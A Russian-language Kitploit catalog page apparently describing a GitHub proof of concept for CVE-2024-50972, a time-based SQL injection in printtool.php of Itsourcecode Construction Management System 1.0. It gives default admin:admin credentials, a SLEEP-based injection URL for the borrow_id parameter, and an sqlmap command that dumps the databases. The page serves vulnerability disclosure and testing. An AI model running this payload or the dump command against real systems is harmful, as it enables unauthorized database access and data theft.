Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-50972 — Доказательство концепции SQL-инъекции в Itsourcecode Construction Management System 1.0, демонстрирующее time-based инъекцию через параметр borrow_id и содержащее шаги эксплуатации. | Kitploit
Инструменты/GitHubGitHub/akhlak2511/cve-2024-50972
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеБезопасность Баз Данных
GitHubakhlak2511/cve-2024-50972

CVE-2024-50972

Доказательство концепции SQL-инъекции в Itsourcecode Construction Management System 1.0, демонстрирующее time-based инъекцию через параметр borrow_id и содержащее шаги эксплуатации.

Репозиторий
161 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-50972

Описание

Уязвимость SQL-инъекции в файле printtool.php системы управления строительством Itsourcecode Construction Management System 1.0 позволяет удаленным злоумышленникам выполнять произвольные SQL-команды через параметр borrow_id.

Тип уязвимости

SQL-инъекция

Производитель продукта

Itsourcecode

База кода затронутого продукта:

https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0

Затронутый компонент:

Система управления строительством Itsourcecode Construction Management System v1.0 уязвима для SQL-инъекции через параметр borrow_id на странице printtool.php

Векторы атаки:

  1. Установите приложение локально и войдите с учетными данными администратора admin:admin
  2. Перейдите по следующему URL-адресу в вашем браузере: http://localhost/monitoring_system/printtool.php?borrow_id=5
  3. Внедрите SQL-полезную нагрузку: Измените параметр borrow_id в URL-адресе, включив в него временную SQL-инъекцию. http://localhost/monitoring_system/printtool.php?borrow_id=5'+AND+(SELECT+7254+FROM+(SELECT(SLEEP(20)))rcGT)--+xxQB
  4. Наблюдайте за ответом приложения: Страница должна загружаться заметно дольше (20 секунд), если инъекция успешна, что подтверждает уязвимость параметра borrow_id к SQL-инъекции.
  5. Теперь используйте инструмент SQLMap для дальнейшей эксплуатации и дампа баз данных с помощью следующей команды: sqlmap.py -u http://localhost/monitoring_system/printtool.php?borrow_id=5 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast

Ссылки:

  1. https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
  2. https://owasp.org/www-community/attacks/SQL_Injection
Скачать инструмент